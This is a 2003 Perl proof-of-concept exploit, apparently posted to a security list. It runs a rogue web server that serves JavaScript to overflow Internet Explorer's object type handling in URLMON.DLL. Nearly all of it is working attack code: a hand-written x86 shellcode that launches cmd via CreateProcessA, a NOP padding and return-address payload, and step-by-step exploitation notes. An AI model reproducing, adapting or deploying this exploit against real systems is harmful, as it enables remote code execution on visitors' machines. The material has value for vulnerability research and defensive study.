IE-object tag longtype exploit

[Alumni <alumni () ok kz>]

#!/usr/bin/perl

#=synopsis
#       06/06/03 - Proof of concept exploit by Sir Alumni (alumni () ok kz)
#       IE-Object longtype dynamic call oferflow
#       [...]
#       url://<$shellcode><'/'x48><jmp %ptr_sh>
#       the flaw actually exists in URLMON.DLL when converting backslashes
#       to wide char,
#       this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#       [...]
#       
#       To exploit:     i)  start server perl script;
#                       ii) connect to http-service using IE/5.x.
#       Tested: IE-5.x, 6.0? on WinXP.
#       Note:   a) the shellcode size is limited up to 56 bytes;
#               b) the '$ret' may differ as well as the image base of 
KERNEL32.DLL;
#               c) to avoid multiple encoding the shellcode is given 'as 
is' with help of JScript.
#=synopsis

use IO::Socket;

$port = 80;
$server = IO::Socket::INET->new (LocalPort => $port,
                                Type =>SOCK_STREAM,
                                Reuse => 1,
                                Listen => $port) or die("Couldnt't create 
server socket\n");


$shellcode =    "\x33\xdb".             # xor ebx, ebx
                "\x8b\xd4".             # mov edx, esp
                "\x80\xc6\xff".         # add dh, 0xFF
                "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63 
("cmd\x01")
                "\x64\x01".             #
                "\x88\x5a\xff".         # mov byte ptr[edx-1], bl
                "\x8d\x42\xfc".         # lea eax, [edx-4]
                "\x8b\xf5".             # mov esi, ebp
                "\x56\x52".             # push esi; push edx
                "\x53\x53\x53\x53\x53\x53".     # push ebx
                "\x50\x53".             # push eax; push ebx
                "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~= 
CreateProcessA
                "\xff\xd0".             # call eax
                "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~= 
ExitProcess
                "\xff\xd0".             # call eax
                "\xcc";                 # int 3

$nop = "\x90";
$ret = "\\xAB\\x5D\\x58";


while ($client = $server->accept()) {
        while (<$client>) {
                if ($_ =~ /^(\x0D\x0A)/) {

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
&lt;script&gt;\r
        var mins = 56;\r
        var size = 48;\r
        var sploit = "$shellcode";\r
        var strNop = "$nop";\r
        var strObj = '&lt;object type="';\r
        for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
        strObj += sploit;\r
        for (i=0;i<size;i++) strObj += '/';\r
        strObj += "CCCCCCCCDDDDDDDD";\r
        strObj += "$ret";\r
        strObj += '">Hello&lt;/object&gt;';\r
        alert(strObj);\r
        document.write(strObj);\r
&lt;/script&gt;\r
END_DATA
                        close($client);

                }
        }
}

close($server);